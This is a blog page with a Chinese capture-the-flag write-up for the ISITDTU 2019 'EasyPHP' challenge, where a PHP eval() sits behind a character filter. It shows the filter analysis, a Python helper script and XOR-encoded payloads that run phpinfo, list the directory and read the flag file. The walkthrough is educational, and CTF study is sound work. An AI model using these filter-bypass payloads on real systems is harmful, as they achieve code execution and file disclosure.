<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="paixiaoxing">
    
    <title>
        
            ISITDTU-EasyPHP |
        
        paixiaoxing&#39;s Blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    <link rel="shortcut icon" href="/images/paidaxing.jpg">
    
<link rel="stylesheet" href="/css/font-awesome.min.css">

    <script id="hexo-configurations">
    let KEEP = window.KEEP || {};
    KEEP.hexo_config = {"hostname":"example.com","root":"/","language":"en","path":"search.xml"};
    KEEP.theme_config = {"toc":{"enable":true,"number":true,"expand_all":false,"init_open":true},"style":{"primary_color":"#0066CC","avatar":"/images/paidaxing.jpg","favicon":"/images/paidaxing.jpg","article_img_align":"left","left_side_width":"260px","content_max_width":"920px","hover":{"shadow":false,"scale":false},"first_screen":{"enable":true,"background_img":"/images/bg.svg","description":"“请用绝对的理智压制不该有的情绪。”"},"scroll":{"progress_bar":{"enable":true},"percent":{"enable":true}}},"local_search":{"enable":false,"preload":false},"code_copy":{"enable":true,"style":"mac"},"pjax":{"enable":false},"lazyload":{"enable":false},"version":"3.4.5"};
    KEEP.language_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
  </script>
<meta name="generator" content="Hexo 6.0.0"></head>


<body>
<div class="progress-bar-container">
    
        <span class="scroll-progress-bar"></span>
    

    
</div>


<main class="page-container">

    

    <div class="page-main-content">

        <div class="page-main-content-top">
            <header class="header-wrapper">

    <div class="header-content">
        <div class="left">
            
                <a class="logo-image" href="/">
                    <img src="/images/paidaxing.jpg">
                </a>
            
            <a class="logo-title" href="/">
                paixiaoxing&#39;s Blog
            </a>
        </div>

        <div class="right">
            <div class="pc">
                <ul class="menu-list">
                    
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                首页
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                归档
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/tags"
                            >
                                TAGS
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/links"
                            >
                                LINKS
                            </a>
                        </li>
                    
                    
                </ul>
            </div>
            <div class="mobile">
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/">首页</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives">归档</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/tags">TAGS</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/links">LINKS</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle">

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="article-content-container">

        <div class="article-title">
            <span class="title-hover-animation">ISITDTU-EasyPHP</span>
        </div>

        
            <div class="article-header">
                <div class="avatar">
                    <img src="/images/paidaxing.jpg">
                </div>
                <div class="info">
                    <div class="author">
                        <span class="name">paixiaoxing</span>
                        
                            <span class="author-label">Lv4</span>
                        
                    </div>
                    <div class="meta-info">
                        <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fas fa-edit"></i>&nbsp;
        <span class="pc">2022-03-11 21:19:34</span>
        <span class="mobile">2022-03-11 21:19</span>
    </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fas fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/ISITDTU/">ISITDTU</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
        <span class="article-pv article-meta-item">
            <i class="fas fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                    </div>
                </div>
            </div>
        

        <div class="article-content markdown-body">
            <h1 id="ISITDTU-2019-EasyPHP"><a href="#ISITDTU-2019-EasyPHP" class="headerlink" title="[ISITDTU 2019]-EasyPHP"></a>[ISITDTU 2019]-EasyPHP</h1><p>进入题目给了源码</p>
<p>一步步分析：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">$</span><span class="bash">_ = @<span class="variable">$_GET</span>[<span class="string">&#x27;_&#x27;</span>];</span></span><br><span class="line">if ( preg_match(&#x27;/[\x00- 0-9\&#x27;&quot;`$&amp;.,|[&#123;_defgops\x7F]+/i&#x27;, $_) )</span><br><span class="line">    die(&#x27;rosé will not do it&#x27;);</span><br><span class="line"></span><br><span class="line">if ( strlen(count_chars(strtolower($_), 0x3)) &gt; 0xd )</span><br><span class="line">    die(&#x27;you are so close, omg&#x27;);</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">eval($</span><span class="bash">_);</span></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>首先查看一下过滤</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"><span class="meta">for($</span><span class="bash">i=0;<span class="variable">$i</span>&lt;129;<span class="variable">$i</span>++)&#123;</span></span><br><span class="line">if(!preg_match(&#x27;/[\x00- 0-9\&#x27;&quot;`$&amp;.,|[&#123;_defgops\x7F]+/i&#x27;, chr($i)))</span><br><span class="line">	echo (chr($i));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>没有过滤的字符：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">!#%()*+-/:;&lt;=&gt;?@ABCHIJKLMNQRTUVWXYZ\]^abchijklmnqrtuvwxyz&#125;~</span><br></pre></td></tr></table></figure>

<p>第二个if功能：</p>
<p>将我们输入的字符串字母全部转换成小写然后统计里面字符出现的次数，如果长度小于13那么就可以执行</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">strtolower — 将字符串转化为小写</span><br><span class="line">count_chars — 返回字符串所用字符的信息：</span><br><span class="line">第二个参数的作用：</span><br><span class="line">0 - 以所有的每个字节值作为键名，出现次数作为值的数组。  </span><br><span class="line">◦ 1 - 与 0 相同，但只列出出现次数大于零的字节值。  </span><br><span class="line">◦ 2 - 与 0 相同，但只列出出现次数等于零的字节值。  </span><br><span class="line">◦ 3 - 返回由所有使用了的字节值组成的字符串。  </span><br><span class="line">◦ 4 - 返回由所有未使用的字节值组成的字符串。 </span><br></pre></td></tr></table></figure>

<p>可以看到没有过滤的字符中有^和~</p>
<p>尝试一下phpinfo</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> urlencode(<span class="string">&#x27;phpinfo&#x27;</span>^urldecode(%ff%ff%ff%ff%ff%ff%ff).<span class="string">&#x27;^%ff%ff%ff%ff%ff%ff%ff&#x27;</span>);</span><br></pre></td></tr></table></figure>

<p><code>%8F%97%8F%96%91%99%90^%ff%ff%ff%ff%ff%ff%ff</code></p>
<p><img src="/2022/03/11/ISITDTU-EasyPHP/1.png" alt="1"></p>
<p>指令正常执行了</p>
<p>接下来就是继续构造数了</p>
<p>首先讲解一下如何构造异或</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">~按位取反</span><br><span class="line">^按位异或</span><br><span class="line">一般来说按位异或得到的结果会更多</span><br><span class="line">异或的构造</span><br></pre></td></tr></table></figure>

<p><img src="/2022/03/11/ISITDTU-EasyPHP/2.png" alt="1"></p>
<p>按位取反就比较单调了，比较一下他俩的区别：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">echo urlencode(&#x27;phpinfo&#x27;^urldecode(&#x27;%ff%ff%ff%ff%ff%ff%ff&#x27;)).&quot;&lt;br /&gt;&quot;;</span><br><span class="line">echo urlencode(~&#x27;phpinfo&#x27;);</span><br></pre></td></tr></table></figure>

<p>他俩的输出结果都是一样的，而异或的右边我们可以更改，所以一般来说如果都没有过滤用的多的还是异或</p>
<p>既然能够执行命令，那么剩下的就是构造命令</p>
<p>看一下phpinfo中禁用的函数：</p>
<p><img src="/2022/03/11/ISITDTU-EasyPHP/3.png" alt="1"></p>
<p>可以看到scandir，跟print_r的组合是没有被禁的</p>
<p>我们就得想办法构造出<code>print_r(scandir(.))</code></p>
<p>除去必须要的字符<code>^ (  )  ; _ .</code>字符，我们能够利用的字符数量只有7个，我们需要用七个字符串构造printscad，但是我们有只剩七个字符</p>
<p>所以我们需要删除，一般三个异或构造的情况会很多，所以用三个异或来看看那些字符是可以删的</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">array = <span class="string">&#x27;acdisp &#x27;</span>   <span class="comment">#printscad             acdilps              readfil</span></span><br><span class="line">now = <span class="string">&#x27;printscad &#x27;</span></span><br><span class="line">s = []</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> now:</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> array:</span><br><span class="line">        <span class="keyword">for</span> m <span class="keyword">in</span> array:</span><br><span class="line">            <span class="keyword">for</span> k <span class="keyword">in</span> array:</span><br><span class="line">                <span class="keyword">if</span>(<span class="built_in">ord</span>(j)^<span class="built_in">ord</span>(m)^<span class="built_in">ord</span>(k)==<span class="built_in">ord</span>(i)):</span><br><span class="line">                        <span class="built_in">print</span>(i + <span class="string">&#x27;=&#x27;</span> + m + <span class="string">&#x27;^&#x27;</span> + j + <span class="string">&#x27;^&#x27;</span> + k)</span><br><span class="line">                        s += i</span><br><span class="line">a = s[<span class="number">0</span>]</span><br><span class="line">count = <span class="number">1</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="built_in">len</span>(s)):</span><br><span class="line">    <span class="keyword">if</span> (a!=s[i]):</span><br><span class="line">        a=s[i]</span><br><span class="line">        count += <span class="number">1</span></span><br><span class="line"><span class="keyword">if</span> count == <span class="number">9</span>:</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;yes&quot;</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>可以一直删直到可以完成条件，可以看到只需要六个字符就可以构造出完整的字符串</p>
<p>print_r(scandit(.));</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">payload:</span><br><span class="line"><span class="meta">((%</span><span class="bash">9E%9E%9E%9B%9B%A0%9E)^(%8F%9C%9E%9C%9C%A0%9C)^(%9E%8F%96%96%8C%A0%8F)^(%FF%FF%FF%FF%FF%FF%FF))(((%9E%9E%9E%9B%9E%9E%9E)^(%9E%9E%9E%9C%9E%9E%9C)^(%8C%9C%9E%96%9B%96%8F)^(%FF%FF%FF%FF%FF%FF%FF))(%D1^%FF));</span></span><br></pre></td></tr></table></figure>

<p><img src="/2022/03/11/ISITDTU-EasyPHP/4.png" alt="1"></p>
<p>一眼就看出flag在末尾，我们用end来置换队列，然后用readfile读取文件就行了</p>
<p>因为调试起来非常麻烦所以我就直接给出答案了用<code>acedils</code>构造scandirefl只需要7个字符串</p>
<p>payload：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">((%</span><span class="bash">8c%9a%9e%9b%9c%96%93%9a)^(%ff%ff%ff%ff%ff%ff%ff%ff)^(%9b%ff%ff%ff%93%ff%ff%ff)^(%9a%ff%ff%ff%96%ff%ff%ff))(((%9a%9c%9b)^(%ff%ff%ff)^(%ff%93%ff)^(%ff%9e%ff))(((%8c%9c%9e%9c%9b%96%8c)^(%ff%ff%ff%ff%ff%ff%ff)^(%ff%ff%ff%93%ff%ff%9b)^(%ff%ff%ff%9e%ff%ff%9a))(%d1^%ff)));</span></span><br></pre></td></tr></table></figure>

<p>flag{b1f02f01-8607-453e-b495-a183409287ef}</p>

        </div>

        
            <div class="post-copyright-info">
                <div class="article-copyright-info-container">
    <ul>
        <li>Post title：ISITDTU-EasyPHP</li>
        <li>Post author：paixiaoxing</li>
        <li>Create time：2022-03-11 21:19:34</li>
        <li>
            Post link：https://keep.xpoet.cn/2022/03/11/ISITDTU-EasyPHP/
        </li>
        <li>
            Copyright Notice：All articles in this blog are licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">BY-NC-SA</a> unless stating additionally.
        </li>
    </ul>
</div>

            </div>
        

        
            <ul class="post-tags-box">
                
                    <li class="tag-item">
                        <a href="/tags/ISITDTU/">#ISITDTU</a>&nbsp;
                    </li>
                
            </ul>
        

        
            <div class="article-nav">
                
                
                    <div class="article-next">
                        <a class="next"
                           rel="next"
                           href="/2022/03/09/FinallySQL/"
                        >
                            <span class="title flex-center">
                                <span class="post-nav-title-item">FinallySQL</span>
                                <span class="post-nav-item">Next posts</span>
                            </span>
                            <span class="right arrow-icon flex-center">
                              <i class="fas fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        

        
    </div>
</div>


                
            </div>

        </div>

        <div class="page-main-content-bottom">
            <footer class="footer">
    <div class="info-container">
        <div class="copyright-info info-item">
            &copy;
            
              <span>2020</span>
              -
            
            2022&nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;<a href="/">paixiaoxing</a>
        </div>
        
            <script async  src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="website-count info-item">
                
                    <span id="busuanzi_container_site_uv">
                        Visitor Count&nbsp;<span id="busuanzi_value_site_uv"></span>&ensp;
                    </span>
                
                
                    <span id="busuanzi_container_site_pv">
                        Totalview&nbsp;<span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="theme-info info-item">
            Powered by <a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;|&nbsp;Theme&nbsp;<a class="theme-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep v3.4.5</a>
        </div>
        
        
    </div>
</footer>

        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="tools-list">
        <!-- TOC aside toggle -->
        
            <li class="tools-item page-aside-toggle">
                <i class="fas fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-bottom-side-tools">
        <div class="side-tools-container">
    <ul class="side-tools-list">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-expand-width flex-center">
            <i class="fas fa-arrows-alt-h"></i>
        </li>

        <li class="tools-item tool-dark-light-toggle flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list">
        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>
        
            <li class="tools-item tool-scroll-to-top flex-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
    </ul>
</div>

    </div>

    
        <aside class="page-aside">
            <div class="post-toc-wrap">
    <div class="post-toc">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#ISITDTU-2019-EasyPHP"><span class="nav-number">1.</span> <span class="nav-text">[ISITDTU 2019]-EasyPHP</span></a></li></ol>
    </div>
</div>
        </aside>
    

    <div class="image-viewer-container">
    <img src="">
</div>


    

</main>




<script src="/js/utils.js"></script>

<script src="/js/main.js"></script>

<script src="/js/header-shrink.js"></script>

<script src="/js/back2top.js"></script>

<script src="/js/dark-light-toggle.js"></script>





    
<script src="/js/code-copy.js"></script>





<div class="post-scripts">
    
        
<script src="/js/left-side-toggle.js"></script>

<script src="/js/libs/anime.min.js"></script>

<script src="/js/toc.js"></script>

    
</div>



</body>
</html>
